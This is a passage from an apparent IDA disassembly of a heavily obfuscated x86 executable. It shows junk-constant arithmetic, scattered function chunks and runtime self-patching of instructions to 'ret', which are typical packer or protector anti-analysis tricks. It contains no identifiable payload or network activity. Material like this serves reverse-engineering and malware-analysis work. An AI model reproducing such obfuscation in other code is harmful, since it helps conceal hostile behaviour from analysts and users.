		jmp	loc_443CC7
; END OF FUNCTION CHUNK	FOR sub_448663
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_44579B:				; CODE XREF: sub_448BC0+3B85j
		jz	loc_444AD9
		jmp	loc_44354C
; END OF FUNCTION CHUNK	FOR sub_448BC0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C8E0

loc_4457A6:				; CODE XREF: sub_43C8E0:loc_44F49Ej
		jz	loc_447CE9
		jmp	loc_452E5E
; END OF FUNCTION CHUNK	FOR sub_43C8E0
; ---------------------------------------------------------------------------
		or	ebx, edx
		cmp	ebx, ebp
		jmp	loc_43C983
; ---------------------------------------------------------------------------

locret_4457BA:				; CODE XREF: hvvrg7ie:0044B702j
		retn
; ---------------------------------------------------------------------------

loc_4457BB:				; CODE XREF: hvvrg7ie:00456DE2j
		jmp	sub_446A16
; ---------------------------------------------------------------------------

loc_4457C0:				; CODE XREF: hvvrg7ie:0044A1B0j
		jmp	loc_45A08D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4395E7

loc_4457C5:				; CODE XREF: sub_4395E7:loc_43C948j
		pop	esi
		rol	eax, 0Eh
		push	offset loc_44D9FE
		jmp	loc_450A60
; END OF FUNCTION CHUNK	FOR sub_4395E7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44271E

loc_4457D3:				; CODE XREF: sub_44271E:loc_457F4Bj
		jz	loc_447D03

loc_4457D9:				; CODE XREF: hvvrg7ie:00457B86j
		jmp	loc_43A314
; END OF FUNCTION CHUNK	FOR sub_44271E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458E44

loc_4457DE:				; CODE XREF: sub_458E44+1j
		mov	eax, [esp+0]
		push	edx
		call	sub_44E560
		push	91E98A5Ah
		pop	eax
		and	eax, 0A50BF899h
		jmp	loc_44A556
; END OF FUNCTION CHUNK	FOR sub_458E44
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_433. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4457F9:				; CODE XREF: hvvrg7ie:0043F1D7j
		jnz	loc_43AC06
; START	OF FUNCTION CHUNK FOR sub_450246

loc_4457FF:				; CODE XREF: sub_450246-2298j
		jmp	loc_442318
; END OF FUNCTION CHUNK	FOR sub_450246
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_445804:				; CODE XREF: sub_445CCD-522Ej
		jmp	nullsub_437
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
		adc	esi, 8BADE51Fh
		push	60357DF3h
		add	ebp, 0CE071885h
		or	eax, edx
		jmp	loc_43AC04
; ---------------------------------------------------------------------------

loc_445821:				; DATA XREF: sub_43B6A5+10399o
		rol	eax, 18h

loc_445824:				; CODE XREF: hvvrg7ie:0044DB9Aj
		push	edi
		push	63D9EB3Bh
		pop	edi
		xor	edi, ds:4000F1h
		rol	edi, 12h
		and	edi, 13D4D745h
		jmp	loc_45A0E5
; ---------------------------------------------------------------------------
		mov	ecx, 0D3F6A299h
		not	ecx
		jmp	sub_43C421
; ---------------------------------------------------------------------------

loc_44584B:				; DATA XREF: sub_4465A6+AFFEo
		push	ecx
		push	35CE962Dh
		pop	ecx
		and	ecx, 0D0CAE890h
		jmp	loc_4570D9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_201. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45974C

loc_44585E:				; CODE XREF: sub_45974C+Bj
		xor	edx, 7A3AD677h
		add	edx, 0EF8F9BF1h
		xchg	edx, [esp+0]

loc_44586D:				; CODE XREF: hvvrg7ie:00442048j
		jmp	sub_439549
; END OF FUNCTION CHUNK	FOR sub_45974C
; ---------------------------------------------------------------------------
		pushf
		jmp	loc_4522F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E7F3

loc_445878:				; CODE XREF: sub_43E128:loc_43E19Ej
					; sub_43E7F3:loc_453870j
		mov	eax, [ebp+var_4]
		call	sub_45A26A
		test	al, al
		jnz	loc_45969D

loc_445888:				; CODE XREF: sub_43EE33-5DFEj
					; sub_43E128:loc_43E132j ...
		pop	ecx
		pop	ecx
		call	sub_459688
; END OF FUNCTION CHUNK	FOR sub_43E7F3
; START	OF FUNCTION CHUNK FOR sub_43A625

loc_44588F:				; CODE XREF: sub_43A625+1Bj
		xor	ebx, 53C7C74Eh
		sub	ecx, ebx
		pop	ebx
		xchg	esi, [esp+0]
		mov	ecx, esi
		pop	esi
		xchg	ecx, [esp-4+arg_0]
		push	ecx
		jmp	loc_44A257
; END OF FUNCTION CHUNK	FOR sub_43A625
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449CB1

loc_4458A7:				; CODE XREF: sub_449CB1+D058j
		add	eax, 0BD4F2B37h
		call	sub_44059F
		push	edi
		push	39A9C238h
		xchg	edx, [esp+8+var_8]
		mov	edi, edx
		pop	edx
; END OF FUNCTION CHUNK	FOR sub_449CB1
; START	OF FUNCTION CHUNK FOR sub_45061E

loc_4458BE:				; CODE XREF: sub_45061E:loc_441385j
		add	edi, 3D18D46Ch
		jmp	loc_4491C0
; END OF FUNCTION CHUNK	FOR sub_45061E
; ---------------------------------------------------------------------------

loc_4458C9:				; CODE XREF: hvvrg7ie:00453CBCj
		cmp	ebx, ecx
		jmp	loc_43E021
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A0C9

loc_4458D0:				; CODE XREF: sub_43E128:loc_441B3Ej
					; sub_43A0C9+1F328j
		push	ecx
		push	4458A81Ch
		pop	ecx
		or	ecx, 0BD3F58B7h
		add	ecx, 2C55052h
		push	offset loc_44904C
		jmp	nullsub_210
; END OF FUNCTION CHUNK	FOR sub_43A0C9
; ---------------------------------------------------------------------------

loc_4458ED:				; CODE XREF: hvvrg7ie:004394C7j
		push	edx
		mov	edx, eax
		xchg	edx, [esp]
		push	0
		push	0
		push	0
		push	0
		push	edx
		jmp	loc_454826
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E507

loc_445901:				; CODE XREF: sub_43E507:loc_439918j
		mov	byte ptr [eax],	0C3h
		jmp	sub_45196D
; END OF FUNCTION CHUNK	FOR sub_43E507
; ---------------------------------------------------------------------------
		call	nullsub_6
		jmp	ds:dword_41D170
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_445914:				; CODE XREF: sub_45038B:loc_44604Bj
					; sub_44808A+8AD9j
		jmp	loc_4428F7
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4441ED

loc_445919:				; CODE XREF: sub_4441ED+15j
		jmp	loc_44812F
; END OF FUNCTION CHUNK	FOR sub_4441ED
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453405

loc_44591E:				; CODE XREF: sub_453405-118CCj
		jmp	sub_447B07
; END OF FUNCTION CHUNK	FOR sub_453405
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_6. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		jo	loc_44BC1A
		mov	eax, [esp]
		jmp	loc_43EFC8
; ---------------------------------------------------------------------------

loc_445932:				; CODE XREF: hvvrg7ie:0045A50Bj
		adc	edi, ebx

; =============== S U B	R O U T	I N E =======================================



sub_445934	proc near		; CODE XREF: sub_44048E+B451p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043B583 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043B5CB SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043BE08 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441BEB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443242 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443707 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00445560 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446D27 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044A04C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DB4B SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044F6EF SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0044FC8C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044FD05 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456A4B SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045774F SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0045786D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004592B3 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045ABB6 SIZE 00000014 BYTES

		xchg	edx, [esp+0]
		pop	edx
		pop	ebx
		xor	eax, 4A987DD7h
		ror	eax, 1Eh

loc_445942:				; CODE XREF: sub_4465A6:loc_439A99j
		jmp	loc_45774F
sub_445934	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_445947:				; CODE XREF: hvvrg7ie:0044FC3Dj
		jz	loc_448702
		jmp	loc_456A8E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BCD

loc_445952:				; CODE XREF: sub_443BCD:loc_448D6Dj
		push	0BCF4F4F9h
		xchg	ecx, [esp+8+var_8]
		mov	edi, ecx
		pop	ecx
		add	edi, ds:4000F3h
		or	edi, 0A362F423h
		add	edi, 0C51A379h
		xchg	edi, [esp+4+var_4]
		jmp	loc_451121
; END OF FUNCTION CHUNK	FOR sub_443BCD
; ---------------------------------------------------------------------------
		cmp	ecx, esi
		jmp	loc_44CE8A
; ---------------------------------------------------------------------------

loc_44597E:				; CODE XREF: hvvrg7ie:00443BF2j
		and	eax, 1C658151h
		jmp	loc_448D53
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAC8

loc_445989:				; CODE XREF: sub_45AAC8+Ej
		jnz	loc_44322E
		jmp	loc_43BBB7
; END OF FUNCTION CHUNK	FOR sub_45AAC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449007

loc_445994:				; CODE XREF: sub_449007:loc_43B942j
		rol	edi, 0Dh
		add	edi, 5642AA39h

loc_44599D:				; CODE XREF: sub_458F33:loc_449917j
		xchg	edi, [esp+8+var_8]
		jmp	loc_44B879
; END OF FUNCTION CHUNK	FOR sub_449007
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4485A2

loc_4459A5:				; CODE XREF: sub_4485A2:loc_44414Bj
		xchg	eax, [edi]
		jmp	loc_4553FA
; END OF FUNCTION CHUNK	FOR sub_4485A2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_4459AC:				; CODE XREF: sub_43F227:loc_45B1F5j
		and	edi, ebx
		adc	esi, ecx

loc_4459B0:				; CODE XREF: hvvrg7ie:0043C0F8j
		cdq
		jmp	loc_43BCAC
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F33

loc_4459B6:				; CODE XREF: sub_458F33-6D00j
		xchg	esi, [ecx]
		cmp	eax, 4674507Dh
		jmp	loc_43BE0D
; END OF FUNCTION CHUNK	FOR sub_458F33
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D247

loc_4459C3:				; CODE XREF: sub_43D247+E658j
					; sub_43D247:loc_456A96j
		call	sub_453E08
		mov	edx, 0DDABAF17h
		call	sub_446A16
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp+0]
		jmp	loc_453DFE
; END OF FUNCTION CHUNK	FOR sub_43D247
; ---------------------------------------------------------------------------
		adc	ebp, 0AA11631Dh
		jnz	loc_443960
		jmp	sub_44531A
; ---------------------------------------------------------------------------

loc_4459EE:				; CODE XREF: hvvrg7ie:0045252Bj
		sbb	esi, 55431DF7h
		cdq
		jmp	near ptr dword_444824+0Bh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_4459FA:				; CODE XREF: sub_43F227+128j
		cmp	dword ptr [eax], 47424454h
		jz	loc_43BCB4
		jmp	loc_44B6E3
; END OF FUNCTION CHUNK	FOR sub_43F227

; =============== S U B	R O U T	I N E =======================================



sub_445A0B	proc near		; DATA XREF: hvvrg7ie:004446BFo
		xchg	ecx, [esp+0]
		jmp	sub_44DE0A
sub_445A0B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BDC2

loc_445A13:				; CODE XREF: sub_43BDC2:loc_44489Dj
		push	0E68609FFh
		pop	eax
		or	eax, 0D8EFA92Eh
		xor	eax, 1A6ABF8Ah
		jmp	loc_43BA8E
; END OF FUNCTION CHUNK	FOR sub_43BDC2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451176

loc_445A2A:				; CODE XREF: sub_451176:loc_442F97j
					; sub_451176-971Ej
		call	sub_44DE0A
		mov	edx, 4CB976E9h
		push	esi
		push	0BB611A26h

loc_445A3A:				; CODE XREF: sub_43B3BE+1DD4Ej
		pop	esi
		xor	esi, 0AA494047h
		rol	esi, 6
		push	offset loc_43D540
		jmp	loc_44C0B7
; END OF FUNCTION CHUNK	FOR sub_451176
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453405

loc_445A4E:				; CODE XREF: sub_453405:loc_455EF9j
		or	eax, eax
		jnz	loc_44DFE2
		jmp	loc_44D102
; END OF FUNCTION CHUNK	FOR sub_453405
; ---------------------------------------------------------------------------

loc_445A5B:				; CODE XREF: hvvrg7ie:00458ED8j
		rol	eax, 0Fh
		jb	loc_454E12
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_445A64:				; CODE XREF: sub_45038B-1715Ej
		jmp	loc_44CE4C
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------
		and	ebx, 0A5713AF2h
		jns	loc_45B029
		cmp	ecx, 9550FCDEh
		jmp	loc_454E0C
; ---------------------------------------------------------------------------

loc_445A80:				; DATA XREF: hvvrg7ie:0044B6FDo
		push	ecx
		pushf
		push	7D35AB05h
		pop	ecx
		jmp	loc_45497F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449387

loc_445A8D:				; CODE XREF: sub_449387:loc_445247j
		jz	loc_443750
		jmp	loc_44009C
; END OF FUNCTION CHUNK	FOR sub_449387
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_445A98:				; CODE XREF: sub_44BCAE:loc_4449DBj
		add	ebx, 850083Dh
		popf
		add	ecx, 913D18EEh
		push	0F1C1D358h
		jmp	loc_458A1E
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B547

loc_445AAF:				; CODE XREF: sub_43B547:loc_450B06j
					; hvvrg7ie:00450B2Aj
		xor	esi, 0F69963B8h
		rol	esi, 3
		test	esi, 2000h
		jmp	loc_45882D
; END OF FUNCTION CHUNK	FOR sub_43B547
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448ECC

loc_445AC3:				; CODE XREF: sub_448ECC-90D5j
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_4525FC
		push	156514F5h
		pop	eax
		or	eax, 0CB83E64Ah
		rol	eax, 1Bh
		jmp	loc_450D28
; END OF FUNCTION CHUNK	FOR sub_448ECC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_445AE0:				; CODE XREF: sub_44D2F8-5F2Dj
		push	34D4F8A9h
		pop	ecx
		or	ecx, 38ADBEF0h

loc_445AEC:				; CODE XREF: sub_45A234:loc_449273j
		xor	ecx, 4254FFA6h
		add	ecx, 9BCE1DB8h

loc_445AF8:				; CODE XREF: sub_45AAC8:loc_43E282j
					; hvvrg7ie:loc_44B5C9j
		add	eax, ecx
		jmp	loc_451A22
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440195

loc_445AFF:				; CODE XREF: sub_440195:loc_459864j
		mov	[edi], eax
		jl	loc_455D00
		jnp	loc_4479D5
		rol	ebx, 0Ch
		jmp	loc_448D7D
; END OF FUNCTION CHUNK	FOR sub_440195
; ---------------------------------------------------------------------------
		xchg	esi, [ebx]
		shl	ebx, 17h
		jmp	sub_455701

; =============== S U B	R O U T	I N E =======================================



sub_445B1F	proc near		; CODE XREF: hvvrg7ie:004414ADj
					; hvvrg7ie:00452EE6p

; FUNCTION CHUNK AT 0045A8C2 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		lea	eax, nullsub_382
		mov	byte ptr [eax],	0C3h
		jmp	loc_45A8C2
sub_445B1F	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_445B31	proc near		; CODE XREF: sub_40C307+2A6p
					; sub_40C307+318p ...
		call	sub_445B46
		jmp	ds:off_41D12C
sub_445B31	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458E44

loc_445B3C:				; CODE XREF: sub_458E44-E8CEj
		jmp	loc_448CA7
; END OF FUNCTION CHUNK	FOR sub_458E44
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C811

loc_445B41:				; CODE XREF: sub_43C811+CD2Ej
		jmp	loc_43F560
; END OF FUNCTION CHUNK	FOR sub_43C811

; =============== S U B	R O U T	I N E =======================================



sub_445B46	proc near		; CODE XREF: sub_43D343+Aj sub_445B31p ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043911E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043946A SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0043D352 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043FFCB SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004460F8 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00447DB1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448385 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044B430 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0045B5F0 SIZE 00000005 BYTES

		jns	loc_43D352
		jmp	loc_448385
sub_445B46	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_120. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_445B52:				; CODE XREF: hvvrg7ie:0045652Aj
		jmp	locret_43D52B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_445B57:				; CODE XREF: sub_456A52:loc_447F66j
		jnz	loc_43FFBA
		jmp	loc_44BAC0
; END OF FUNCTION CHUNK	FOR sub_456A52
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44271E

loc_445B62:				; CODE XREF: sub_44271E+11E53j
		add	ebp, ecx
		jmp	loc_447D03
; END OF FUNCTION CHUNK	FOR sub_44271E
; ---------------------------------------------------------------------------

loc_445B69:				; CODE XREF: hvvrg7ie:0043AD9Dj
		sub	al, 99h
		push	offset loc_44F274
		jmp	locret_44D498
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_445B75:				; CODE XREF: sub_43F227:loc_441F7Bj
		push	9BDA01DDh
		jmp	loc_44EBC3
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453E08

loc_445B7F:				; CODE XREF: sub_453E08-5F87j
		jb	loc_45B24E

loc_445B85:				; CODE XREF: sub_453E08:loc_440DFBj
		lea	edx, [ebp-14h]
		mov	eax, offset loc_43D6F8
		call	sub_456DE7
		lea	eax, [ebp-14h]
		push	eax
		call	sub_43A87E
		jmp	loc_4500F0
; END OF FUNCTION CHUNK	FOR sub_453E08

; =============== S U B	R O U T	I N E =======================================



sub_445BA0	proc near		; DATA XREF: hvvrg7ie:0045161Eo

; FUNCTION CHUNK AT 0044701B SIZE 00000007 BYTES

		pop	edx
		call	sub_445408

loc_445BA6:				; CODE XREF: hvvrg7ie:0044D0A1j
		jmp	loc_44701B
sub_445BA0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_445BAB:				; DATA XREF: sub_45AB9D-14F1Ao
		add	edx, ebp
		add	edx, 0B75D75C8h
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_450C47
		jmp	loc_45A9AD
; ---------------------------------------------------------------------------

locret_445BC4:				; CODE XREF: hvvrg7ie:loc_446D54j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451D60

loc_445BC5:				; CODE XREF: sub_451D60-12310j
		jmp	loc_44F2DF
; END OF FUNCTION CHUNK	FOR sub_451D60
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_33. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456F9F

loc_445BCB:				; CODE XREF: sub_456F9F+122Bj
		jmp	loc_43EAD2
; END OF FUNCTION CHUNK	FOR sub_456F9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442D68

loc_445BD0:				; CODE XREF: sub_442D68+A486j
		jmp	nullsub_526
; END OF FUNCTION CHUNK	FOR sub_442D68
; ---------------------------------------------------------------------------

loc_445BD5:				; CODE XREF: hvvrg7ie:00450662j
		jno	loc_45A5A8
		jmp	loc_45B954
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_445BE0:				; CODE XREF: sub_43E128:loc_44D9B8j
		mov	[ebp-4], eax
		jmp	loc_43E19E
; END OF FUNCTION CHUNK	FOR sub_43E128

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_445BE8	proc near		; CODE XREF: sub_43E128+19p
					; sub_454E9F:loc_454EA3p

var_20		= dword	ptr -20h

; FUNCTION CHUNK AT 0044644D SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00448E78 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004494D8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044994D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B855 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00455973 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455D53 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457689 SIZE 00000008 BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFD8h
		jmp	loc_455D53
sub_445BE8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	al, 1
		push	offset sub_43C40C
		jmp	loc_44D48C
; ---------------------------------------------------------------------------

locret_445BFF:				; CODE XREF: hvvrg7ie:0044CD48j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448100

loc_445C00:				; CODE XREF: sub_448100+D216j
		jmp	loc_439279
; END OF FUNCTION CHUNK	FOR sub_448100
; ---------------------------------------------------------------------------

loc_445C05:				; CODE XREF: hvvrg7ie:0044448Aj
		add	esi, 8E51FE72h
; START	OF FUNCTION CHUNK FOR sub_451E1C

loc_445C0B:				; CODE XREF: sub_451E1C:loc_444470j
		xor	eax, 0A042592Eh
		add	eax, 871F4592h
		call	sub_450C5A
		call	sub_43D0B7

loc_445C21:				; CODE XREF: hvvrg7ie:0045B2F0j
		jmp	loc_44F24A
; END OF FUNCTION CHUNK	FOR sub_451E1C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4557D4

loc_445C26:				; CODE XREF: sub_4557D4-980Bj
		jnp	loc_4412FE
		jmp	loc_43CFEC
; END OF FUNCTION CHUNK	FOR sub_4557D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_445C31:				; CODE XREF: sub_44616F+63DEj
		add	eax, ebp
		add	eax, 37487CEh
		mov	eax, [eax]
		mov	al, [eax]
		push	0A164B721h
		pop	edx
		and	edx, 0ACDBD90Ch
		xor	edx, 9B4147B1h
		jmp	loc_4403E2
; END OF FUNCTION CHUNK	FOR sub_44616F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453BA4

loc_445C54:				; CODE XREF: sub_453BA4:loc_44FB8Cj
		xchg	ebx, [esp+0Ch+var_C]
		mov	edx, eax
		call	sub_456DE7
		jmp	loc_43C6C6
; END OF FUNCTION CHUNK	FOR sub_453BA4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458A13

loc_445C63:				; CODE XREF: sub_458A13j
		push	offset sub_4521D4
		jmp	nullsub_334
; END OF FUNCTION CHUNK	FOR sub_458A13
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AB9D

loc_445C6D:				; CODE XREF: sub_45AB9D-DAEBj
		sbb	ebx, 4040C34Ch
		add	edx, eax

loc_445C75:				; CODE XREF: sub_45AB9D:loc_44D0A6j
		rol	edx, 1
		sub	edx, ds:4000F8h
		add	edx, 53944E5Dh
		push	offset loc_445BAB
		jmp	nullsub_434
; END OF FUNCTION CHUNK	FOR sub_45AB9D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E6D

loc_445C8D:				; CODE XREF: sub_451E6D-C173j
		jz	loc_4520C2

loc_445C93:				; CODE XREF: hvvrg7ie:0043B194j
		jmp	loc_45613D
; END OF FUNCTION CHUNK	FOR sub_451E6D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44989C

loc_445C98:				; CODE XREF: sub_44989C:loc_43D38Bj
		push	62DE4A97h
		pop	ebx
		xor	ebx, 0D40301C2h
		add	ebx, 47F04580h
		cmp	ebx, 54A94E87h
		jmp	loc_455F44
; END OF FUNCTION CHUNK	FOR sub_44989C

; =============== S U B	R O U T	I N E =======================================



sub_445CB5	proc near		; DATA XREF: hvvrg7ie:0044DB6Eo

var_14		= dword	ptr -14h

; FUNCTION CHUNK AT 004418D0 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00442278 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00444D03 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A7B0 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044B2BF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045447F SIZE 0000000B BYTES

		or	edx, edx
		jnz	loc_447B4E
		jmp	loc_444D03
sub_445CB5	endp

; ---------------------------------------------------------------------------

loc_445CC2:				; CODE XREF: hvvrg7ie:0044F2C1j
		jz	loc_43EDF3
		jmp	loc_449A5C

; =============== S U B	R O U T	I N E =======================================



sub_445CCD	proc near		; CODE XREF: sub_43BC7Ep
					; hvvrg7ie:004497E0j ...

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00439B08 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00439DBB SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0043A6B3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043B405 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0043B56F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043B6D2 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043BBAD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C19F SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0043DA62 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043F38E SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043FD9B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440519 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440A94 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00441F59 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004422FC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004426C4 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004428C9 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00443180 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443297 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443B8B SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00443F25 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004444C7 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00445804 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446A98 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004472F7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447C90 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004491C5 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004497E5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044A548 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044B258 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044BBF5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C1E3 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044C3C0 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044C520 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044D921 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044ED4B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F297 SIZE 00000016 BYTES
